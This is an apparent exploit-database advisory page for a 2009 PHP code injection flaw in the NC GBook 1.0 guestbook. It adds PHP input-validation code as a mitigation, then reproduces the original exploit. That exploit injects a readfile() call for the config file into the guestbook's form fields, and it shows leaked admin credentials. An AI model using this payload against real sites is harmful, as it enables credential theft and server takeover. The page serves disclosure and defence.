Vendor: NC GBook
By: ThE g0bL!N
CVSS: 9.3 (HIGH)
Type: Remote Command Injection
CWE: 78
Product Name: NC GBook
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:php-gaestebuch:nc_gbook:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2009

NC GBook 1.0 Remote Command injection Exploit

NC GBook 1.0 does not sufficiently sanitize user-supplied input in the 'Autor', 'E-Mail' and 'Homepage' fields when a new entry is added. An attacker can exploit this to inject arbitrary commands into the application, which are executed with the privileges of the web server process. This can be used to gain access to the server or to execute arbitrary PHP code.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
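
One way to apply this to the three fields named above, as an added example that is not NC GBook's own code. The function names, array keys and the JSON-lines data file are assumptions made for illustration.

```php
<?php
// Added example: hypothetical handler; names and keys are assumptions, not NC GBook code.
function gb_validate_entry(array $in): array
{
    $errors   = [];
    $autor    = trim((string)($in['autor'] ?? ''));
    $email    = trim((string)($in['email'] ?? ''));
    $homepage = trim((string)($in['homepage'] ?? ''));

    // Autor: allow-list of letters, digits, space and . _ ' - so "<", "?" and ">" are rejected.
    if (!preg_match('/^[\p{L}\p{N} ._\'-]{1,64}$/u', $autor)) {
        $errors[] = 'autor';
    }
    // E-Mail: must parse as a single address.
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        $errors[] = 'email';
    }
    // Homepage: optional; if present it must be an http(s) URL without markup characters.
    if ($homepage !== '') {
        $scheme = strtolower((string)parse_url($homepage, PHP_URL_SCHEME));
        if (filter_var($homepage, FILTER_VALIDATE_URL) === false
            || !in_array($scheme, ['http', 'https'], true)
            || strpbrk($homepage, "<>\"'") !== false) {
            $errors[] = 'homepage';
        }
    }
    return ['ok' => $errors === [], 'errors' => $errors,
            'entry' => ['autor' => $autor, 'email' => $email, 'homepage' => $homepage]];
}

function gb_store_entry(array $entry, string $file): void
{
    // One JSON line per entry, in a data file kept outside the web root and read back
    // with json_decode(), never include()d, so entry text is never parsed as PHP.
    file_put_contents($file, json_encode($entry, JSON_UNESCAPED_UNICODE) . "\n", FILE_APPEND | LOCK_EX);
}

function gb_render_field(string $value): string
{
    // Encode on output so stored text cannot become markup in the rendered page.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample input: the field value shown in the advisory, and a valid entry.
$bad  = gb_validate_entry(['autor' => '<? readfile("./config/config.php"); ?>', 'email' => 'a@example.org']);
$good = gb_validate_entry(['autor' => 'Anna Muster', 'email' => 'anna@example.org', 'homepage' => 'https://example.org/']);
var_dump($bad['ok'], $bad['errors'], $good['ok']);
```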

Exploit-DB raw data:

--------------------------------------------------------------
NC GBook 1.0 Remote Command injection Exploit
---------------------------------------------------------------
Founder: ThE g0bL!N
Vendor: http://www.php-gaestebuch.com
Thank You Very Much His0k4
Download: http://www.php-gaestebuch.com/downloads/1.0/
Note: You Can choose Any Function in Php :)
---------------------------------------------------------------
Exploit:
--------
  1) Go To Url:
     ---------
     http://wwww.victim.co.il/[path]/index.php?gbAction=add .

  2) Write In:
     --------
     Autor:    <? readfile("./config/config.php"); ?>.
     E-Mail:   <? readfile("./config/config.php"); ?>.
     Homepage: <? readfile("./config/config.php"); ?>.

  3) Post The Topic:
     --------------

  4) View Source:
     -----------

  5) Hack The site :)
     ---------------
Example:
--------
$gbConfig['database']['system'] = "mysql";
$gbConfig['database']['server'] = "localhost";
$gbConfig['database']['user'] = "";
$gbConfig['database']['password'] = "";
$gbConfig['database']['name'] = "";
----------------------------------------
$gbConfig['admin_username'] = "ThE g0bL!N";
$gbConfig['admin_password'] = "sh5d81d6zs7yt4g41g";
$gbConfig['admin_email'] = "x0q@hotmail.fr";
--------------------------------------------------
Demo:
----
http://www.php-gaestebuch.com/demo/
----------------------------------------------------------------
Greetz : His0k4 Dos-Dz TeaM Snakes TeaM And All My Friends (dz)
-----------------------------------------------------------------

# milw0rm.com [2009-05-20]